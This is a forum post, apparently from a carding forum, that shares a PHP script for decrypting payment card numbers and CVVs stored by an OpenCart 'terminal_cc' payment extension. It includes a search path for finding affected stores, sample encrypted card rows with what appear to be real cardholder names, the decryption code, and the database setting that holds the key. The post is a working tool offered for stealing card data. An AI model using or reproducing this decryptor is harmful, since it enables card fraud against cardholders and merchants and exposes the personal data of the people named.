Man
Professional
- Messages
- 3,093
- Reaction score
- 635
- Points
- 113
Good morning! I came across an interesting form of payment, terminal_cc . The trick of this form is that the card data is stored directly in the store's database. Of course, I couldn't just pass by and wrote a decryptor, which I am happy to share with the forum. And so in order:
How to search:
- in response, a blank page.
Examples of encrypted cards:
Decryptor code:
The key is stored in the database:
Video:
How to search:
Code:
/catalog/controller/extension/payment/terminal_cc.phpExamples of encrypted cards:
Code:
('2853', '9052', 'Brandy Polanco', '02/27', 'M3N5bG42NjNveEtIMGRTTmg2WFVGQT09', 'PC2pSCcxwl1FaOeG', 'MdLmvyIp0RACuklLxNOFWw==', 'NUtVMQ==', 'nLKetXb9akOkXo04', '4GnLDgUbZGOvn/Km4A78nw==', '', '', '', '0');
('2854', '9053', '******************************ine Glavey', '06/29', 'V1cvT0JsVkszZ2tIVjhscFRPWlc=', 'WipEov+Zsz7xNlJX', 'BzQ34HJTutcksd26ya1JWQ==', 'aE5HRmZ3PT0=', 'YDrJuFxhTtcWpTGu', 'gYJgvC6HQMT3AdJ07LRawA==', '', '', '', '0');
('2855', '9054', '******************************ine P. Glavey ', '04/29', 'TXFoeVJsSytLc0dlUmJHd0JodExFQT09', 'TXv8M8M2Mt0SK49B', 'UhscnxjrBt9K2XN1iRwXBA==', 'M2FaYw==', 'IRMytspwRZQNexqz', 'wtNDDh6DdtX/jZ/qSfCrqQ==', '', '', '', '0');
('2856', '9055', 'Antoinette Fett', '03/28', 'b2xVNjJWWDdLemdwR0ZSMFJSSzRSQT09', '8H7s54g34LIC7T8y', 'Pql/RDNFPWAxM9fyHqPdjQ==', 'SzNzcQ==', 'WhBdJC8cluJLQIU7', 'kPnBhPVTYy96sE8Fo7FCbA==', '', '', '', '0');
('2857', '9056', 'Nicole L Campbell', '12/28', 'ODZYaDZWNHNGQmNOc0ZoVWhBMlZuQT09', 'IvopCkM3dafAj0T0', 'gix+aYm9aw8kNGKG3CCW0w==', 'OW5iQg==', '2ynV/PuPp6M7doQ7', 'asbLreY9lE6zItIkBVp3VA==', '', '', '', '0');Decryptor code:
Code:
<?php
/** (`id`, `order_id`, `cc_name`, `cc_expirationdate`, `e_cc_cardnumber`, `e_cc_cardnumber_iv`, `e_cc_cardnumber_tag`, `e_cc_securitycode`, `e_cc_securitycode_iv`, `e_cc_securitycode_tag`, `e_cc_passport`, `e_cc_passport_iv`, `e_cc_passport_tag`, `removed`) **/
function decrpt($c,$i,$t){
$cipher = "aes-128-gcm";
$secret_key = '';
$key = hash('sha256', $secret_key);
$text = openssl_decrypt(base64_decode($c), $cipher, $key, 0, base64_decode($i), base64_decode($t));
return $text;
}
$f_cc = file('CARDS.sql');
foreach($f_cc as $st){
$data = explode(',', $st);
if(isset($data[3])){
$holder = $data[2];
$date = $data[3];
$num = decrpt($data[4],$data[5],$data[6]);
$cvv = decrpt($data[7],$data[8],$data[9]);
print $holder.':'.$num.':'.$date.':'.$cvv. PHP_EOL;
//die();
}
}The key is stored in the database:
Code:
INSERT INTO `oc_setting` (`setting_id`, `store_id`, `code`, `key`, `value`, `serialized`) VALUES ('33598', '0', 'payment_terminal_cc', 'payment_terminal_cc_encryption', '64e074e3b11c9e9fbb8afd10f3be49ca', '0');Video:
